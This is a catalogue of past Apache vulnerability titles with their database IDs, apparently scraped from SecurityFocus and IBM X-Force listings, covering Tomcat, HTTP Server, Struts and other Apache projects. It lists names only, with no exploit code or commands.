| [37942] Apache Tomcat Directory Host Appbase Authentication Bypass Vulnerability
| [37149] Apache Tomcat 404 Error Page Cross Site Scripting Vulnerability
| [37027] RETIRED: Apache APR 'apr_uri_parse_hostinfo' Off By One Remote Code Execution Vulnerability
| [36990] Apache HTTP TRACE Cross Site Scripting Vulnerability
| [36954] Apache Tomcat Windows Installer Insecure Password Vulnerability
| [36889] TYPO3 Apache Solr Search Extension Unspecified Cross Site Scripting Vulnerability
| [36596] Apache HTTP Server Solaris Event Port Pollset Support Remote Denial Of Service Vulnerability
| [36260] Apache mod_proxy_ftp Module NULL Pointer Dereference Denial Of Service Vulnerability
| [36254] Apache mod_proxy_ftp Remote Command Injection Vulnerability
| [35949] Apache APR and APR-util Multiple Integer Overflow Vulnerabilities
| [35840] Apache HTTP Server HTTP-Basic Authentication Bypass Vulnerability
| [35623] Apache 'mod_deflate' Remote Denial Of Service Vulnerability
| [35565] Apache 'mod_proxy' Remote Denial Of Service Vulnerability
| [35416] Apache Tomcat XML Parser Information Disclosure Vulnerability
| [35263] Apache Tomcat 'RequestDispatcher' Information Disclosure Vulnerability
| [35253] Apache APR-util 'xml/apr_xml.c' Denial of Service Vulnerability
| [35251] Apache APR-util 'apr_brigade_vprintf' Off By One Vulnerability
| [35221] Apache APR-util 'apr_strmatch_precompile()' Integer Underflow Vulnerability
| [35196] Apache Tomcat Form Authentication Existing/Non-Existing Username Enumeration Weakness
| [35193] Apache Tomcat Java AJP Connector Invalid Header Denial of Service Vulnerability
| [35115] Apache 'Options' and 'AllowOverride' Directives Security Bypass Vulnerability
| [34686] Apache Struts Multiple Cross Site Scripting Vulnerabilities
| [34663] Apache 'mod_proxy_ajp' Information Disclosure Vulnerability
| [34657] Apache Tiles Cross Site Scripting And Information Disclosure Vulnerabilities
| [34562] Apache Geronimo Application Server Multiple Remote Vulnerabilities
| [34552] Apache ActiveMQ Web Console Multiple Unspecified HTML Injection Vulnerabilities
| [34412] Apache Tomcat mod_jk Content Length Information Disclosure Vulnerability
| [34399] Apache Struts Unspecified Cross Site Scripting Vulnerability
| [34383] Apache mod_perl 'Apache::Status' and 'Apache2::Status' Cross Site Scripting Vulnerability
| [33913] Apache Tomcat POST Data Information Disclosure Vulnerability
| [33360] Apache Jackrabbit 'q' Parameter Multiple Cross Site Scripting Vulnerabilities
| [33110] Apache Roller 'q' Parameter Cross Site Scripting Vulnerability
| [32657] Novell NetWare ApacheAdmin Security Bypass Vulnerability
| [31805] Apache HTTP Server OS Fingerprinting Unspecified Security Vulnerability
| [31761] Oracle WebLogic Server Apache Connector Stack Based Buffer Overflow Vulnerability
| [31698] Apache Tomcat 'RemoteFilterValve' Security Bypass Vulnerability
| [31165] Kolab Groupware Server Apache Log File User Password Information Disclosure Vulnerability
| [30560] Apache 'mod_proxy_ftp' Wildcard Characters Cross-Site Scripting Vulnerability
| [30496] Apache Tomcat 'HttpServletResponse.sendError()' Cross Site Scripting Vulnerability
| [30494] Apache Tomcat 'RequestDispatcher' Information Disclosure Vulnerability
| [29653] Apache 'mod_proxy_http' Interim Response Denial of Service Vulnerability
| [29502] Apache Tomcat Host Manager Cross Site Scripting Vulnerability
| [28576] Apache-SSL Environment Variable Information Disclosure and Privilege Escalation Vulnerability
| [28484] Apache Tomcat Requests Containing MS-DOS Device Names Information Disclosure Vulnerability
| [28483] Apache Tomcat 'allowLinking' Accepts NULL Byte in URI Information Disclosure Vulnerability
| [28482] Apache Tomcat SSL Anonymous Cipher Configuration Information Disclosure Vulnerability
| [28481] Apache Tomcat Cross-Site Scripting Vulnerability
| [28477] Apache Tomcat AJP Connector Information Disclosure Vulnerability
| [27752] Apache mod_jk2 Host Header Multiple Stack Based Buffer Overflow Vulnerabilities
| [27706] Apache Tomcat Cookie Quote Handling Remote Information Disclosure Vulnerability
| [27703] Apache Tomcat Parameter Processing Remote Information Disclosure Vulnerability
| [27409] Apache 'mod_negotiation' HTML Injection and HTTP Response Splitting Vulnerability
| [27365] Apache Tomcat SingleSignOn Remote Information Disclosure Vulnerability
| [27237] Apache HTTP Server 2.2.6, 2.0.61 and 1.3.39 'mod_status' Cross-Site Scripting Vulnerability
| [27236] Apache 'mod_proxy_balancer' Multiple Vulnerabilities
| [27234] Apache 'mod_proxy_ftp' Undefined Charset UTF-7 Cross-Site Scripting Vulnerability
| [27006] Apache Tomcat JULI Logging Component Default Security Policy Vulnerability
| [26939] Apache HTTP Server Windows Share PHP File Extension Mapping Information Disclosure Vulnerability
| [26838] Apache mod_imagemap and mod_imap Cross-Site Scripting Vulnerability
| [26762] Apache::AuthCAS Cookie SQL Injection Vulnerability
| [26663] Apache HTTP Server 413 Error HTTP Request Method Cross-Site Scripting Weakness
| [26287] Apache Geronimo SQLLoginModule Authentication Bypass Vulnerability
| [26070] Apache Tomcat WebDav Remote Information Disclosure Vulnerability
| [25804] Apache Geronimo Management EJB Security Bypass Vulnerability
| [25653] Apache Mod_AutoIndex.C Undefined Charset Cross-Site Scripting Vulnerability
| [25531] Apache Tomcat Cal2.JSP Cross-Site Scripting Vulnerability
| [25489] Apache HTTP Server Mod_Proxy Denial of Service Vulnerability
| [25316] Apache Tomcat Multiple Remote Information Disclosure Vulnerabilities
| [25314] Apache Tomcat Host Manager Servlet Cross Site Scripting Vulnerability
| [25174] Apache Tomcat Error Message Reporting Cross Site Scripting Vulnerability
| [24999] Apache Tomcat SendMailServlet Cross-Site Scripting Vulnerability
| [24759] MySQLDumper Apache Access Control Authentication Bypass Vulnerability
| [24649] Apache HTTP Server Mod_Cache Denial of Service Vulnerability
| [24645] Apache HTTP Server Mod_Status Cross-Site Scripting Vulnerability
| [24553] Apache Mod_Mem_Cache Information Disclosure Vulnerability
| [24524] Apache Tomcat Accept-Language Cross Site Scripting Vulnerability
| [24480] Apache MyFaces Tomahawk JSF Framework Autoscroll Parameter Cross Site Scripting Vulnerability
| [24476] Apache Tomcat JSP Example Web Applications Cross Site Scripting Vulnerability
| [24475] Apache Tomcat Manager and Host Manager Upload Script Cross-Site Scripting Vulnerability
| [24215] Apache HTTP Server Worker Process Multiple Denial of Service Vulnerabilities
| [24147] Apache Tomcat JK Connector Double Encoding Security Bypass Vulnerability
| [24058] Apache Tomcat Documentation Sample Application Multiple Cross-Site Scripting Vulnerabilities
| [23687] Apache AXIS Non-Existent WSDL Path Information Disclosure Vulnerability
| [23438] Apache HTTPD suEXEC Local Multiple Privilege Escalation Weaknesses
| [22960] Apache HTTP Server Tomcat Directory Traversal Vulnerability
| [22849] Apache mod_python Output Filter Mode Information Disclosure Vulnerability
| [22791] Apache Tomcat Mod_JK.SO Arbitrary Code Execution Vulnerability
| [22732] Debian Apache Root Shell Local Privilege Escalation Vulnerabilities
| [22388] Apache Stats Extract Function Multiple Input Validation Vulnerabilities
| [21865] Apache And Microsoft IIS Range Denial of Service Vulnerability
| [21214] Apache Mod_Auth_Kerb Off-By-One Denial of Service Vulnerability
| [20527] Apache Mod_TCL Remote Format String Vulnerability
| [19661] Apache HTTP Server Arbitrary HTTP Request Headers Security Weakness
| [19447] Apache CGI Script Source Code Information Disclosure Vulnerability
| [19204] Apache Mod_Rewrite Off-By-One Buffer Overflow Vulnerability
| [19106] Apache Tomcat Information Disclosure Vulnerability
| [18138] Apache James SMTP Denial Of Service Vulnerability
| [17342] Apache Struts Multiple Remote Vulnerabilities
| [17095] Apache Log4Net Denial Of Service Vulnerability
| [16916] Apache mod_python FileSession Code Execution Vulnerability
| [16710] Apache Libapreq2 Quadratic Behavior Denial of Service Vulnerability
| [16260] Apache Geronimo Multiple Input Validation Vulnerabilities
| [16153] Apache mod_auth_pgsql Multiple Format String Vulnerabilities
| [16152] Apache Mod_SSL Custom Error Document Remote Denial Of Service Vulnerability
| [15834] Apache 'mod_imap' Referer Cross-Site Scripting Vulnerability
| [15765] Apache James Spooler Memory Leak Denial Of Service Vulnerability
| [15762] Apache MPM Worker.C Denial Of Service Vulnerability
| [15512] Apache Struts Error Response Cross-Site Scripting Vulnerability
| [15413] PHP Apache 2 Virtual() Safe_Mode and Open_Basedir Restriction Bypass Vulnerability
| [15325] Apache Tomcat Simultaneous Directory Listing Denial Of Service Vulnerability
| [15224] Apache Mod_Auth_Shadow Authentication Bypass Vulnerability
| [15177] PHP Apache 2 Local Denial of Service Vulnerability
| [14982] ApacheTop Insecure Temporary File Creation Vulnerability
| [14721] Apache Mod_SSL SSLVerifyClient Restriction Bypass Vulnerability
| [14660] Apache CGI Byterange Request Denial of Service Vulnerability
| [14366] Apache mod_ssl CRL Handling Off-By-One Buffer Overflow Vulnerability
| [14106] Apache HTTP Request Smuggling Vulnerability
| [13778] Apache HTPasswd Password Command Line Argument Buffer Overflow Vulnerability
| [13777] Apache HTPasswd User Command Line Argument Buffer Overflow Vulnerability
| [13756] Apache Tomcat Java Security Manager Bypass Vulnerability
| [13537] Apache HTDigest Realm Command Line Argument Buffer Overflow Vulnerability
| [12877] Apache mod_ssl ssl_io_filter_cleanup Remote Denial Of Service Vulnerability
| [12795] Apache Tomcat Remote Malformed Request Denial Of Service Vulnerability
| [12619] Apache Software Foundation Batik Squiggle Browser Access Validation Vulnerability
| [12519] Apache mod_python Module Publisher Handler Information Disclosure Vulnerability
| [12308] Apache Utilities Insecure Temporary File Creation Vulnerability
| [12217] Apache mod_auth_radius Malformed RADIUS Server Reply Integer Overflow Vulnerability
| [12181] Mod_DOSEvasive Apache Module Local Insecure Temporary File Creation Vulnerability
| [11803] Apache Jakarta Results.JSP Remote Cross-Site Scripting Vulnerability
| [11471] Apache mod_include Local Buffer Overflow Vulnerability
| [11360] Apache mod_ssl SSLCipherSuite Restriction Bypass Vulnerability
| [11239] Apache Satisfy Directive Access Control Bypass Vulnerability
| [11187] Apache Web Server Remote IPv6 Buffer Overflow Vulnerability
| [11185] Apache Mod_DAV LOCK Denial Of Service Vulnerability
| [11182] Apache Web Server Configuration File Environment Variable Local Buffer Overflow Vulnerability
| [11154] Apache mod_ssl Remote Denial of Service Vulnerability
| [11094] Apache mod_ssl Denial Of Service Vulnerability
| [10789] Apache mod_userdir Module Information Disclosure Vulnerability
| [10736] Apache 'mod_ssl' Log Function Format String Vulnerability
| [10619] Apache ap_escape_html Memory Allocation Denial Of Service Vulnerability
| [10508] Apache Mod_Proxy Remote Negative Content-Length Buffer Overflow Vulnerability
| [10478] ClueCentral Apache Suexec Patch Security Weakness
| [10355] Apache 'mod_ssl' 'ssl_util_uuencode_binary()' Stack Buffer Overflow Vulnerability
| [10212] Apache mod_auth Malformed Password Potential Memory Corruption Vulnerability
| [9933] Apache mod_disk_cache Module Client Authentication Credential Storage Weakness
| [9930] Apache Error and Access Logs Escape Sequence Injection Vulnerability
| [9921] Apache Connection Blocking Denial Of Service Vulnerability
| [9885] Apache Mod_Security Module SecFilterScanPost Off-By-One Buffer Overflow Vulnerability
| [9874] Apache HTAccess LIMIT Directive Bypass Configuration Error Weakness
| [9829] Apache Mod_Access Access Control Rule Bypass Vulnerability
| [9826] Apache Mod_SSL HTTP Request Remote Denial Of Service Vulnerability
| [9733] Apache Cygwin Directory Traversal Vulnerability
| [9599] Apache mod_php Global Variables Information Disclosure Weakness
| [9590] Apache-SSL Client Certificate Forging Vulnerability
| [9571] Apache mod_digest Client-Supplied Nonce Verification Vulnerability
| [9471] Apache mod_perl Module File Descriptor Leakage Vulnerability
| [9404] Mod-Auth-Shadow Apache Module Expired User Credential Weakness
| [9302] Apache mod_php Module File Descriptor Leakage Vulnerability
| [9129] Apache mod_python Module Malformed Query Denial of Service Vulnerability
| [8926] Apache Web Server mod_cgid Module CGI Data Redirection Vulnerability
| [8919] Apache Mod_Security Module Heap Corruption Vulnerability
| [8911] Apache Web Server Multiple Module Local Buffer Overflow Vulnerability
| [8898] Red Hat Apache Directory Index Default Configuration Error
| [8883] Apache Cocoon Directory Traversal Vulnerability
| [8824] Apache Tomcat Non-HTTP Request Denial Of Service Vulnerability
| [8822] Apache Mod_Throttle Module Local Shared Memory Corruption Vulnerability
| [8725] Apache2 MOD_CGI STDERR Denial Of Service Vulnerability
| [8707] Apache htpasswd Password Entropy Weakness
| [8561] Apache::Gallery Insecure Local File Storage Privilege Escalation Vulnerability
| [8287] Mod_Mylo Apache Module REQSTR Buffer Overflow Vulnerability
| [8226] Apache HTTP Server Multiple Vulnerabilities
| [8138] Apache Web Server Type-Map Recursive Loop Denial Of Service Vulnerability
| [8137] Apache Web Server Prefork MPM Denial Of Service Vulnerability
| [8136] Macromedia Apache Web Server Encoded Space Source Disclosure Vulnerability
| [8135] Apache Web Server FTP Proxy IPV6 Denial Of Service Vulnerability
| [8134] Apache Web Server SSLCipherSuite Weak CipherSuite Renegotiation Weakness
| [7768] Apache Tomcat Insecure Directory Permissions Vulnerability
| [7725] Apache Basic Authentication Module Valid User Login Denial Of Service Vulnerability
| [7723] Apache APR_PSPrintf Memory Corruption Vulnerability
| [7448] Apache Mod_Auth_Any Remote Command Execution Vulnerability
| [7375] Apache Mod_Access_Referer NULL Pointer Dereference Denial of Service Vulnerability
| [7332] Apache Web Server OS2 Filestat Denial Of Service Vulnerability
| [7255] Apache Web Server File Descriptor Leakage Vulnerability
| [7254] Apache Web Server Linefeed Memory Allocation Denial Of Service Vulnerability
| [6943] Apache Web Server MIME Boundary Information Disclosure Vulnerability
| [6939] Apache Web Server ETag Header Information Disclosure Weakness
| [6722] Apache Tomcat Web.XML File Contents Disclosure Vulnerability
| [6721] Apache Tomcat Null Byte Directory/File Disclosure Vulnerability
| [6720] Apache Tomcat Example Web Application Cross Site Scripting Vulnerability
| [6662] Apache Web Server MS-DOS Device Name Denial Of Service Vulnerability
| [6661] Apache Web Server Default Script Mapping Bypass Vulnerability
| [6660] Apache Web Server Illegal Character HTTP Request File Disclosure Vulnerability
| [6659] Apache Web Server MS-DOS Device Name Arbitrary Code Execution Vulnerability
| [6562] Apache Tomcat Invoker Servlet File Disclosure Vulnerability
| [6320] Apache/Tomcat Mod_JK Chunked Encoding Denial Of Service Vulnerability
| [6117] Apache mod_php File Descriptor Leakage Vulnerability
7050| [6065] Apache 2 WebDAV CGI POST Request Information Disclosure Vulnerability
7051| [5996] Apache AB.C Web Benchmarking Buffer Overflow Vulnerability
7052| [5995] Apache AB.C Web Benchmarking Read_Connection() Buffer Overflow Vulnerability
7053| [5993] Multiple Apache HTDigest Buffer Overflow Vulnerabilities
7054| [5992] Apache HTDigest Insecure Temporary File Vulnerability
7055| [5991] Apache HTDigest Arbitrary Command Execution Vulnerability
7056| [5990] Apache HTPasswd Insecure Temporary File Vulnerability
7057| [5981] Multiple Apache HTDigest and HTPassWD Component Vulnerabilites
7058| [5884] Apache Web Server Scoreboard Memory Segment Overwriting SIGUSR1 Sending Vulnerability
7059| [5847] Apache Server Side Include Cross Site Scripting Vulnerability
7060| [5838] Apache Tomcat 3.2 Directory Disclosure Vulnerability
7061| [5816] Apache 2 mod_dav Denial Of Service Vulnerability
7062| [5791] HP VirtualVault Apache mod_ssl Denial Of Service Vulnerability
7063| [5787] Apache Oversized STDERR Buffer Denial Of Service Vulnerability
7064| [5786] Apache Tomcat DefaultServlet File Disclosure Vulnerability
7065| [5542] Apache Tomcat 4.1 JSP Request Cross Site Scripting Vulnerability
7066| [5486] Apache 2.0 CGI Path Disclosure Vulnerability
7067| [5485] Apache 2.0 Path Disclosure Vulnerability
7068| [5434] Apache 2.0 Encoded Backslash Directory Traversal Vulnerability
7069| [5256] Apache httpd 2.0 CGI Error Path Disclosure Vulnerability
7070| [5194] Apache Tomcat DOS Device Name Cross Site Scripting Vulnerability
7071| [5193] Apache Tomcat Servlet Mapping Cross Site Scripting Vulnerability
7072| [5067] Apache Tomcat Null Character Malformed Request Denial Of Service Vulnerability
7073| [5054] Apache Tomcat Web Root Path Disclosure Vulnerability
7074| [5033] Apache Chunked-Encoding Memory Corruption Vulnerability
7075| [4995] Apache Tomcat JSP Engine Denial of Service Vulnerability
7076| [4878] Apache Tomcat RealPath.JSP Malformed Request Information Disclosure Vulnerability
7077| [4877] Apache Tomcat Example Files Web Root Path Disclosure Vulnerability
7078| [4876] Apache Tomcat Source.JSP Malformed Request Information Disclosure Vulnerability
7079| [4575] Apache Tomcat Servlet Path Disclosure Vulnerability
7080| [4557] Apache Tomcat System Path Information Disclosure Vulnerability
7081| [4437] Apache Error Message Cross-Site Scripting Vulnerability
7082| [4431] Apache PrintEnv/Test_CGI Script Injection Vulnerability
7083| [4358] Apache Double-Reverse Lookup Log Entry Spoofing Vulnerability
7084| [4335] Apache Win32 Batch File Remote Command Execution Vulnerability
7085| [4292] Oracle 9iAS Apache PL/SQL Module Web Administration Access Vulnerability
7086| [4189] Apache mod_ssl/Apache-SSL Buffer Overflow Vulnerability
7087| [4057] Apache 2 for Windows OPTIONS request Path Disclosure Vulnerability
7088| [4056] Apache 2 for Windows php.exe Path Disclosure Vulnerability
7089| [4037] Oracle 9iAS Apache PL/SQL Module Denial of Service Vulnerability
7090| [4032] Oracle 9iAS Apache PL/SQL Module Multiple Buffer Overflows Vulnerability
7091| [3796] Apache HTTP Request Unexpected Behavior Vulnerability
7092| [3790] Apache Non-Existent Log Directory Denial Of Service Vulnerability
7093| [3786] Apache Win32 PHP.EXE Remote File Disclosure Vulnerability
7094| [3727] Oracle 9I Application Server PL/SQL Apache Module Directory Traversal Vulnerability
7095| [3726] Oracle 9I Application Server PL/SQL Apache Module Buffer Overflow Vulnerability
7096| [3596] Apache Split-Logfile File Append Vulnerability
7097| [3521] Apache mod_usertrack Predictable ID Generation Vulnerability
7098| [3335] Red Hat Linux Apache Remote Username Enumeration Vulnerability
7099| [3316] MacOS X Client Apache Directory Contents Disclosure Vulnerability
7100| [3256] Apache mod_auth_oracle Remote SQL Query Manipulation Vulnerability
7101| [3255] Apache mod_auth_mysql Remote SQL Query Manipulation Vulnerability
7102| [3254] Apache AuthPG Remote SQL Query Manipulation Vulnerability
7103| [3253] Apache mod_auth_pgsql_sys Remote SQL Query Manipulation Vulnerability
7104| [3251] Apache mod_auth_pgsql Remote SQL Query Manipulation Vulnerability
7105| [3176] Apache Mod ReWrite Rules Bypassing Image Linking Vulnerability
7106| [3169] Apache Server Address Disclosure Vulnerability
7107| [3009] Apache Possible Directory Index Disclosure Vulnerability
7108| [2982] Apache Tomcat Cross-Site Scripting Vulnerability
7109| [2852] MacOS X Client Apache File Protection Bypass Vulnerability
7110| [2740] Apache Web Server HTTP Request Denial of Service Vulnerability
7111| [2518] Apache Tomcat 3.0 Directory Traversal Vulnerability
7112| [2503] Apache Artificially Long Slash Path Directory Listing Vulnerability
7113| [2300] NCSA/Apache httpd ScriptAlias Source Retrieval Vulnerability
7114| [2216] Apache Web Server DoS Vulnerability
7115| [2182] Apache /tmp File Race Vulnerability
7116| [2171] Oracle Apache+WebDB Documented Backdoor Vulnerability
7117| [2060] Apache Web Server with Php 3 File Disclosure Vulnerability
7118| [1821] Apache mod_cookies Buffer Overflow Vulnerability
7119| [1728] Apache Rewrite Module Arbitrary File Disclosure Vulnerability
7120| [1658] SuSE Apache CGI Source Code Viewing Vulnerability
7121| [1656] SuSE Apache WebDAV Directory Listings Vulnerability
7122| [1575] Trustix Apache-SSL RPM Permissions Vulnerability
7123| [1548] Apache Jakarta-Tomcat /admin Context Vulnerability
7124| [1532] Apache Tomcat Snoop Servlet Information Disclosure Vulnerability
7125| [1531] Apache Tomcat 3.1 Path Revealing Vulnerability
7126| [1457] Apache::ASP source.asp Example Script Vulnerability
7127| [1284] Apache HTTP Server (win32) Root Directory Access Vulnerability
7128| [1083] Cobalt Raq Apache .htaccess Disclosure Vulnerability
7129|
| IBM X-Force - https://exchange.xforce.ibmcloud.com:
| [86258] Apache CloudStack text fields cross-site scripting
| [85983] Apache Subversion mod_dav_svn module denial of service
| [85875] Apache OFBiz UEL code execution
| [85874] Apache OFBiz Webtools View Log screen cross-site scripting
| [85871] Apache HTTP Server mod_session_dbd unspecified
| [85756] Apache Struts OGNL expression command execution
| [85755] Apache Struts DefaultActionMapper class open redirect
| [85586] Apache ActiveMQ CVE-2013-1879 cross-site scripting
| [85574] Apache HTTP Server mod_dav denial of service
| [85573] Apache Struts Showcase App OGNL code execution
| [85496] Apache CXF denial of service
| [85423] Apache Geronimo RMI classloader code execution
| [85326] Apache Santuario XML Security for C++ buffer overflow
| [85323] Apache Santuario XML Security for Java spoofing
| [85319] Apache Qpid Python client SSL spoofing
| [85019] Apache Santuario XML Security for C++ CVE-2013-2156 buffer overflow
| [85018] Apache Santuario XML Security for C++ CVE-2013-2155 denial of service
| [85017] Apache Santuario XML Security for C++ CVE-2013-2154 buffer overflow
| [85016] Apache Santuario XML Security for C++ CVE-2013-2153 spoofing
| [84952] Apache Tomcat CVE-2012-3544 denial of service
| [84763] Apache Struts CVE-2013-2135 security bypass
| [84762] Apache Struts CVE-2013-2134 security bypass
| [84719] Apache Subversion CVE-2013-2088 command execution
| [84718] Apache Subversion CVE-2013-2112 denial of service
| [84717] Apache Subversion CVE-2013-1968 denial of service
| [84577] Apache Tomcat security bypass
| [84576] Apache Tomcat symlink
| [84543] Apache Struts CVE-2013-2115 security bypass
| [84542] Apache Struts CVE-2013-1966 security bypass
| [84154] Apache Tomcat session hijacking
| [84144] Apache Tomcat denial of service
| [84143] Apache Tomcat information disclosure
| [84111] Apache HTTP Server command execution
| [84043] Apache Virtual Computing Lab cross-site scripting
| [84042] Apache Virtual Computing Lab cross-site scripting
| [83782] Apache CloudStack information disclosure
| [83781] Apache CloudStack security bypass
| [83720] Apache ActiveMQ cross-site scripting
| [83719] Apache ActiveMQ denial of service
| [83718] Apache ActiveMQ denial of service
| [83263] Apache Subversion denial of service
| [83262] Apache Subversion denial of service
| [83261] Apache Subversion denial of service
| [83259] Apache Subversion denial of service
| [83035] Apache mod_ruid2 security bypass
| [82852] Apache Qpid federation_tag security bypass
| [82851] Apache Qpid qpid::framing::Buffer denial of service
| [82758] Apache Rave User RPC API information disclosure
| [82663] Apache Subversion svn_fs_file_length() denial of service
| [82642] Apache Qpid qpid::framing::Buffer::checkAvailable() denial of service
| [82641] Apache Qpid AMQP denial of service
| [82626] Apache HTTP Server on Debian GNU/Linux Debian apache2ctl symlink
| [82618] Apache Commons FileUpload symlink
| [82360] Apache HTTP Server manager interface cross-site scripting
| [82359] Apache HTTP Server hostnames cross-site scripting
| [82338] Apache Tomcat log/logdir information disclosure
| [82328] Apache Maven and Apache Maven Wagon SSL spoofing
| [82268] Apache OpenJPA deserialization command execution
| [81981] Apache CXF UsernameTokens security bypass
| [81980] Apache CXF WS-Security security bypass
| [81398] Apache OFBiz cross-site scripting
| [81240] Apache CouchDB directory traversal
| [81226] Apache CouchDB JSONP code execution
| [81225] Apache CouchDB Futon user interface cross-site scripting
| [81211] Apache Axis2/C SSL spoofing
| [81167] Apache CloudStack DeployVM information disclosure
| [81166] Apache CloudStack AddHost API information disclosure
| [81165] Apache CloudStack createSSHKeyPair API information disclosure
| [80518] Apache Tomcat cross-site request forgery security bypass
| [80517] Apache Tomcat FormAuthenticator security bypass
| [80516] Apache Tomcat NIO denial of service
| [80408] Apache Tomcat replay-countermeasure security bypass
| [80407] Apache Tomcat HTTP Digest Access Authentication security bypass
| [80317] Apache Tomcat slowloris denial of service
| [79984] Apache Commons HttpClient SSL spoofing
| [79983] Apache CXF SSL spoofing
| [79830] Apache Axis2/Java SSL spoofing
| [79829] Apache Axis SSL spoofing
| [79809] Apache Tomcat DIGEST security bypass
| [79806] Apache Tomcat parseHeaders() denial of service
| [79540] Apache OFBiz unspecified
| [79487] Apache Axis2 SAML security bypass
| [79212] Apache Cloudstack code execution
| [78734] Apache CXF SOAP Action security bypass
| [78730] Apache Qpid broker denial of service
| [78617] Eucalyptus Apache Santuario (XML Security for Java) denial of service
| [78563] Apache mod_pagespeed module unspecified cross-site scripting
| [78562] Apache mod_pagespeed module security bypass
| [78454] Apache Axis2 security bypass
| [78452] Websense Web Security and Web Filter Apache Tomcat information disclosure
| [78451] Websense Web Security and Web Filter Apache Tomcat cross-site scripting
| [78321] Apache Wicket unspecified cross-site scripting
| [78183] Apache Struts parameters denial of service
| [78182] Apache Struts cross-site request forgery
| [78153] Apache Solr Autocomplete module for Drupal autocomplete results cross-site scripting
| [77987] mod_rpaf module for Apache denial of service
| [77958] Apache Struts skill name code execution
| [77914] Apache HTTP Server mod_negotiation module cross-site scripting
| [77913] Apache HTTP Server mod_proxy_ajp information disclosure
| [77568] Apache Qpid broker security bypass
| [77421] Apache Libcloud spoofing
| [77059] Oracle Solaris Cluster Apache Tomcat Agent unspecified
| [77046] Oracle Solaris Apache HTTP Server information disclosure
| [76837] Apache Hadoop information disclosure
| [76802] Apache Sling CopyFrom denial of service
| [76692] Apache Hadoop symlink
| [76535] Apache Roller console cross-site request forgery
| [76534] Apache Roller weblog cross-site scripting
| [76152] Apache CXF elements security bypass
| [76151] Apache CXF child policies security bypass
| [75983] MapServer for Windows Apache file include
| [75857] Apache Commons Compress and Apache Ant bzip2 denial of service
| [75558] Apache POI denial of service
| [75545] PHP apache_request_headers() buffer overflow
| [75302] Apache Qpid SASL security bypass
| [75211] Debian GNU/Linux apache 2 cross-site scripting
| [74901] Apache HTTP Server LD_LIBRARY_PATH privilege escalation
| [74871] Apache OFBiz FlexibleStringExpander code execution
| [74870] Apache OFBiz multiple cross-site scripting
| [74750] Apache Hadoop unspecified spoofing
| [74319] Apache Struts XSLTResult.java file upload
| [74313] Apache Traffic Server header buffer overflow
| [74276] Apache Wicket directory traversal
| [74273] Apache Wicket unspecified cross-site scripting
| [74181] Apache HTTP Server mod_fcgid module denial of service
| [73690] Apache Struts OGNL code execution
| [73432] Apache Solr extension for TYPO3 unspecified cross-site scripting
| [73100] Apache MyFaces in directory traversal
| [73096] Apache APR hash denial of service
| [73052] Apache Struts name cross-site scripting
| [73030] Apache CXF UsernameToken security bypass
| [72888] Apache Struts lastName cross-site scripting
| [72758] Apache HTTP Server httpOnly information disclosure
| [72757] Apache HTTP Server MPM denial of service
| [72585] Apache Struts ParameterInterceptor security bypass
| [72438] Apache Tomcat Digest security bypass
| [72437] Apache Tomcat Digest security bypass
| [72436] Apache Tomcat DIGEST security bypass
| [72425] Apache Tomcat parameter denial of service
| [72422] Apache Tomcat request object information disclosure
| [72377] Apache HTTP Server scoreboard security bypass
| [72345] Apache HTTP Server HTTP request denial of service
| [72229] Apache Struts ExceptionDelegator command execution
| [72089] Apache Struts ParameterInterceptor directory traversal
| [72088] Apache Struts CookieInterceptor command execution
| [72047] Apache Geronimo hash denial of service
| [72016] Apache Tomcat hash denial of service
| [71711] Apache Struts OGNL expression code execution
| [71654] Apache Struts interfaces security bypass
| [71620] Apache ActiveMQ failover denial of service
| [71617] Apache HTTP Server mod_proxy module information disclosure
| [71508] Apache MyFaces EL security bypass
| [71445] Apache HTTP Server mod_proxy security bypass
| [71203] Apache Tomcat servlets privilege escalation
| [71181] Apache HTTP Server ap_pregsub() denial of service
| [71093] Apache HTTP Server ap_pregsub() buffer overflow
| [70336] Apache HTTP Server mod_proxy information disclosure
| [69804] Apache HTTP Server mod_proxy_ajp denial of service
| [69472] Apache Tomcat AJP security bypass
| [69396] Apache HTTP Server ByteRange filter denial of service
| [69394] Apache Wicket multi window support cross-site scripting
| [69176] Apache Tomcat XML information disclosure
| [69161] Apache Tomcat jsvc information disclosure
| [68799] mod_authnz_external module for Apache mysql-auth.pl SQL injection
| [68541] Apache Tomcat sendfile information disclosure
| [68420] Apache XML Security denial of service
| [68238] Apache Tomcat JMX information disclosure
| [67860] Apache Rampart/C rampart_timestamp_token_validate security bypass
| [67804] Apache Subversion control rules information disclosure
| [67803] Apache Subversion control rules denial of service
| [67802] Apache Subversion baselined denial of service
| [67672] Apache Archiva multiple cross-site scripting
| [67671] Apache Archiva multiple cross-site request forgery
| [67564] Apache APR apr_fnmatch() denial of service
| [67532] IBM WebSphere Application Server org.apache.jasper.runtime.JspWriterImpl.response denial of service
| [67515] Apache Tomcat annotations security bypass
| [67480] Apache Struts s:submit information disclosure
| [67414] Apache APR apr_fnmatch() denial of service
| [67356] Apache Struts javatemplates cross-site scripting
| [67354] Apache Struts Xwork cross-site scripting
| [66676] Apache Tomcat HTTP BIO information disclosure
| [66675] Apache Tomcat web.xml security bypass
| [66640] Apache HttpComponents HttpClient Proxy-Authorization information disclosure
| [66241] Apache HttpComponents information disclosure
| [66154] Apache Tomcat ServletSecurity security bypass
| [65971] Apache Tomcat ServletSecurity security bypass
| [65876] Apache Subversion mod_dav_svn denial of service
| [65343] Apache Continuum unspecified cross-site scripting
| [65162] Apache Tomcat NIO connector denial of service
| [65161] Apache Tomcat javax.servlet.ServletRequest.getLocale() denial of service
| [65160] Apache Tomcat HTML Manager interface cross-site scripting
| [65159] Apache Tomcat ServletContect security bypass
| [65050] Apache CouchDB web-based administration UI cross-site scripting
| [64773] Oracle HTTP Server Apache Plugin unauthorized access
| [64473] Apache Subversion blame -g denial of service
| [64472] Apache Subversion walk() denial of service
| [64407] Apache Axis2 CVE-2010-0219 code execution
| [63926] Apache Archiva password privilege escalation
| [63785] Apache CouchDB LD_LIBRARY_PATH privilege escalation
| [63493] Apache Archiva credentials cross-site request forgery
| [63477] Apache Tomcat HttpOnly session hijacking
| [63422] Apache Tomcat sessionsList.jsp cross-site scripting
| [63303] Apache mod_fcgid module fcgid_header_bucket_read() buffer overflow
| [62959] Apache Shiro filters security bypass
| [62790] Apache Perl cgi module denial of service
| [62576] Apache Qpid exchange denial of service
| [62575] Apache Qpid AMQP denial of service
| [62354] Apache Qpid SSL denial of service
| [62235] Apache APR-util apr_brigade_split_line() denial of service
| [62181] Apache XML-RPC SAX Parser information disclosure
| [61721] Apache Traffic Server cache poisoning
